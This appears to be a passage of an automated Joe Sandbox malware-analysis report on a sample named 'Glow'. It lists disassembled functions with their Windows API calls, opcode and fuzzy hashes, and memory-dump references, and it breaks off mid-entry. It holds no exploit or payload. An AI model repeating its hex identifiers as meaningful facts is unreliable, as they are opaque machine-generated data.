                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                          • Opcode ID: 7c84900d47349221ca2912a2b4de4b594d25af44023c6e6f11c00a6a458c3281
                                                                                                                                                                          • Instruction ID: 5bc99786f58af144a8df813a64a8fe168307e5ac2eb2b610d94136d55df56a5d
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c84900d47349221ca2912a2b4de4b594d25af44023c6e6f11c00a6a458c3281
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D32E175A00305AFDB12EF54D884ABAB7B9FF45341F1680AAED06AB351C734ED45CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                          • Opcode ID: 7a7eba1c66e3a1b42d0dd192cd92e469b092622c229d2e378ba99205ad9452c0
                                                                                                                                                                          • Instruction ID: 9ac96e609286eae9310a16caaca735c488c95d429c863dd4c8a722faa483c863
                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7eba1c66e3a1b42d0dd192cd92e469b092622c229d2e378ba99205ad9452c0
                                                                                                                                                                          • Instruction Fuzzy Hash: EAD16B74E0420AEFCB15EF94C4819AEBBB5FF48310F1441AAE915AB391DB34BD42CB95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 776e2f9defe6924cba6fbfc8ac540b1e60e9a348ae761ff24131c0c8695279bd
                                                                                                                                                                          • Instruction ID: 6a55894a7c49a26629ca9873e70bb7c4b46171b58b084e5d2828653e8e079c64
                                                                                                                                                                          • Opcode Fuzzy Hash: 776e2f9defe6924cba6fbfc8ac540b1e60e9a348ae761ff24131c0c8695279bd
                                                                                                                                                                          • Instruction Fuzzy Hash: 1851BB79A00104AFDB12DFD8C841BB97BA5EF86364F1A8578E8189F351D731DD42CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 003EFCCE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BuffCharLower
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2358735015-0
                                                                                                                                                                          • Opcode ID: d6ba15edc9f26f5fd9ab26c9531537f010a4394ef3e0163ee52e595a31049247
                                                                                                                                                                          • Instruction ID: f73000ee21b22a51b981582c91aa960011a2c4aef722dba10285bc9c73cfa6ac
                                                                                                                                                                          • Opcode Fuzzy Hash: d6ba15edc9f26f5fd9ab26c9531537f010a4394ef3e0163ee52e595a31049247
                                                                                                                                                                          • Instruction Fuzzy Hash: 4341D976500249AFCB16EF69CC819EF77B8EF44314B21463EE5169B195DBB0DE04CB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038664A
                                                                                                                                                                            • Part of subcall function 0038663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0038665C
                                                                                                                                                                            • Part of subcall function 0038663E: FreeLibrary.KERNEL32(00000000,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038666E
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003862FA,?,00000001,?,?,00000000), ref: 003866AB
                                                                                                                                                                            • Part of subcall function 00386607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386610
                                                                                                                                                                            • Part of subcall function 00386607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00386622
                                                                                                                                                                            • Part of subcall function 00386607: FreeLibrary.KERNEL32(00000000,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386635
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2632591731-0
                                                                                                                                                                          • Opcode ID: 5d6157261cf35032970faa4586c2be5733e96b371b8cb0ad36e932fb796d0a11
                                                                                                                                                                          • Instruction ID: 6b7db695e3e5fd985033edee47b7ffed0ff5e499ec13bc6168965be113a66e54
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d6157261cf35032970faa4586c2be5733e96b371b8cb0ad36e932fb796d0a11
                                                                                                                                                                          • Instruction Fuzzy Hash: 35112372600305ABCF16BB20C803BAD7BA59F50710F20886DF542AE1C2EF75DA049B64
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                          • Opcode ID: 9e2fc97a2eab68a66b31577b2ce3008347d867be45cafd0bb62b2f13a97c058f
                                                                                                                                                                          • Instruction ID: 80306709f828ddf292d7d3e84f7f3580d29b76247ae85ec94b6ee0a599c973e3
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e2fc97a2eab68a66b31577b2ce3008347d867be45cafd0bb62b2f13a97c058f
                                                                                                                                                                          • Instruction Fuzzy Hash: B611487190420AAFCF06DF58E945ADA7BF8EF48304F114069F909AB311DA31EE11CB65
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003B4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003B319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 003B5031
                                                                                                                                                                          • _free.LIBCMT ref: 003B53DF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                          • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                          • Instruction ID: ecd8d113e02164f5b092f1f4517463f737c360b9081d14d381152a7d25945d61
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                          • Instruction Fuzzy Hash: 38014E762003046BE3328F55D841F9AFBEDEB85374F25051DE684876C0EB706905C774
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                          • Instruction ID: 7653e7b78a1160b168822fed4943dd16074db64b54745c74ec84a7b0abbb01fc
                                                                                                                                                                          • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0CD325017245AE6333A679C05B9B335CCF43334F154719F5259B9D1DF78D80186D2
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                          • Opcode ID: dd9d1fee6e1b47460c33700809ebdf374f6bf11b9184f1257674075ff0af719f
                                                                                                                                                                          • Instruction ID: d677f6a06dec08e75a2b46b6c1afa17232343659e284121ddf9eaeb8828fd240
                                                                                                                                                                          • Opcode Fuzzy Hash: dd9d1fee6e1b47460c33700809ebdf374f6bf11b9184f1257674075ff0af719f
                                                                                                                                                                          • Instruction Fuzzy Hash: 93F0C8B76017057ED7159F28D806BA6BB98EB45360F10822AFA19CF1D1DB71E5108BA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 003FF987
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1431749950-0
                                                                                                                                                                          • Opcode ID: 191e59fc0dd9bafb999afe5be3151fb3e87616c5811db44ef284711a170c0d5b
                                                                                                                                                                          • Instruction ID: 2c7f6ca2b1acbe21a2f6c290ff0b66fbfc58c9d4f8520d37b7b30ef94f3628ef
                                                                                                                                                                          • Opcode Fuzzy Hash: 191e59fc0dd9bafb999afe5be3151fb3e87616c5811db44ef284711a170c0d5b
                                                                                                                                                                          • Instruction Fuzzy Hash: EBF08176600204BFCB06EBA5DC46D9F77B8EF46710F004054F5059F260DA70EA40C751
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003B319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 003B5031
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 77761a9c8f8eb10e07d26107e8e478cb4e26c5e1b632c36f22fde486fe691206
                                                                                                                                                                          • Instruction ID: 2c48d5e3ef894951454af9b32c4ac060211e6c9738fa17ce3ac5d8bbce2836bf
                                                                                                                                                                          • Opcode Fuzzy Hash: 77761a9c8f8eb10e07d26107e8e478cb4e26c5e1b632c36f22fde486fe691206
                                                                                                                                                                          • Instruction Fuzzy Hash: D4F0E936614E2467EF333A76DC01BDA3758FF917E4F168021BE049B890DB70D80146E0
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 9e1bd2cc44d627e474d6b62419ffb7767a631368bd675d287d540dd0fb75e35e
                                                                                                                                                                          • Instruction ID: 7433eaad84ca4b7d73654c6717470e6088077ca9e6310a238e34106ec5c07aab
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e1bd2cc44d627e474d6b62419ffb7767a631368bd675d287d540dd0fb75e35e
                                                                                                                                                                          • Instruction Fuzzy Hash: F2E09B3124063066DB23B6769C01BEB3A4CEF423A4F160161FE059ADD5DF70DD4085E4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4b4d1425c6ac63cc53f98495b85d9483c0cf42de1c5539bb7aa71c9507c7d8ea
                                                                                                                                                                          • Instruction ID: 28ac439a611c8df18c2c640a5fe2a9d5b237752654c206336817f19ec55bf298
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b4d1425c6ac63cc53f98495b85d9483c0cf42de1c5539bb7aa71c9507c7d8ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 95F039B1505B02CFCB36AF64D8A1C16BBE8BF14329325897EE5D686A10C735AC80DF51
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                          • Instruction ID: 98fb19d63e91b1e5ad54446e8315a3aed2b727d7960baef20f456535a5ea9804
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                          • Instruction Fuzzy Hash: FCF0F87550020DFFDF05DF90C941E9EBB79FB04318F208489F9159A151C336EA61ABA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00383963
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                          • Opcode ID: 2b6262ece54de0703be6445628e0909500e609b5671ac455e486dcf12781ef82
                                                                                                                                                                          • Instruction ID: 249ed6f3a52b40f6a1f3c63e6d284975560adfb394c1765eb9ffcb7945eeb138
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6262ece54de0703be6445628e0909500e609b5671ac455e486dcf12781ef82
                                                                                                                                                                          • Instruction Fuzzy Hash: A6F037719143149FE7539F24DC457D67BBCA702708F0040F6A64496292D7B49788CF55
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00383A76
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                          • Opcode ID: c2150c3abeb9c62eee362b04e83428d68a816a616bad7cc2caf73ff0426d2a3b
                                                                                                                                                                          • Instruction ID: 46f285c642a6c0ad01e7cc0f4e535d9e0377fb104885a4a165ad53b9aaf64a81
                                                                                                                                                                          • Opcode Fuzzy Hash: c2150c3abeb9c62eee362b04e83428d68a816a616bad7cc2caf73ff0426d2a3b
                                                                                                                                                                          • Instruction Fuzzy Hash: 85E08C72A002245BCB21A2589C06FEAB7ADDB887A0F0440B5BC09DB258D960AD808690
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,003C0A84,?,?,00000000,?,003C0A84,00000000,0000000C), ref: 003C0737
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 7237d6ed0b25e561667b52de49fe3a1ea413953c2ebaaee0473ed0f986f54601
